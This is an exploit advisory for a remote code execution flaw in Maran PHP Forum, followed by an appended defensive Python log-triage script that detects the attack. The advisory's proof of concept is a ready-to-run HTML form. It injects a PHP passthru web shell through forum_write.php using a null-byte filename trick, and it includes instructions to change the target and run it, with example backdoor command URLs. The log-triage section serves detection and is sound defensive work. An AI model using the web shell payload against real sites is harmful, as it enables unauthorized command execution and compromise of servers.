From: Dj7xpl <dj7xpl_(at)_yahoo.com>
Date: 30.04.2007
Subject: Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+                                               Y! Underground Group
+
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+          Portal......:  Maran PHP Forum
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com
+          Type........:  Remote Code Execution
+          Download....:  http://www.maran.pamil-visions.com/maranforum.php
+          Page........:  http://Dj7xpl.2600.ir
+
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+          Xpl.........:
+  <html><head><Title>---===Maran PHP Forum===------===Dj7xpl===---</title></head>
+  <body bgcolor="red">
+  <center>
+  <form name="AimStats" method="post" action="http://site.com/path to site/forum_write.php">
+  <input name="name" value="<?passthru($_GET[cmd])?>" type="text" >
+  <input name="page" value="pagename.php%00" type="text" >
+  <input type="submit" name="Submit" value="Submit" >
+  </form><br><br>
+  <font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>
+  <font color="#C0FF3E" size="+1"> Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell</font></br>
+  <font color="#C0FF3E" size="+1"> E.g  :  http://site.com/forum/data/filename.php?cmd=ls -la</font>
+  </center>
+  </body>
+  </html>
+
+
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]
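
Added example, not part of the original advisory: a log-triage sketch for the two-stage pattern the proof of concept shows, a POST to forum_write.php followed by a request for a .php file under data/ carrying a cmd parameter. The log format, the sample lines, and the names triage, LINE_RE and DATA_PHP_RE are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not from the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [30/Apr/2007:10:00:01 +0000] "POST /forum/forum_write.php HTTP/1.1" 200 512
198.51.100.7 - - [30/Apr/2007:10:00:05 +0000] "GET /forum/data/pagename.php?cmd=ls%20-la HTTP/1.1" 200 64
203.0.113.9 - - [30/Apr/2007:10:01:00 +0000] "POST /forum/forum_write.php HTTP/1.1" 200 498
203.0.113.9 - - [30/Apr/2007:10:01:02 +0000] "GET /forum/ HTTP/1.1" 200 2048
192.0.2.44 - - [30/Apr/2007:10:02:00 +0000] "GET /forum/data/pagename.php HTTP/1.1" 404 210
"""

# client, method, request target, status (assumed common/combined log layout)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
# A PHP script directly inside a data/ directory: the location the advisory
# gives for the written file.
DATA_PHP_RE = re.compile(r'/data/[^/]+\.php$', re.IGNORECASE)


def triage(log_text):
    """Return (client, path, status, reasons) for requests to PHP files in data/."""
    writers = set()  # clients already seen POSTing to forum_write.php
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        if method == "POST" and url.path.lower().endswith("/forum_write.php"):
            writers.add(ip)
            continue
        if DATA_PHP_RE.search(url.path):
            reasons = ["php-in-data-dir"]
            if "cmd" in parse_qs(url.query, keep_blank_values=True):
                reasons.append("cmd-parameter")
            if ip in writers:
                reasons.append("client-posted-to-forum_write")
            findings.append((ip, url.path, status, reasons))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request means a script in data/ was actually served; configuring the web server so that nothing under data/ is executed as PHP removes that second stage regardless of what was written there.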
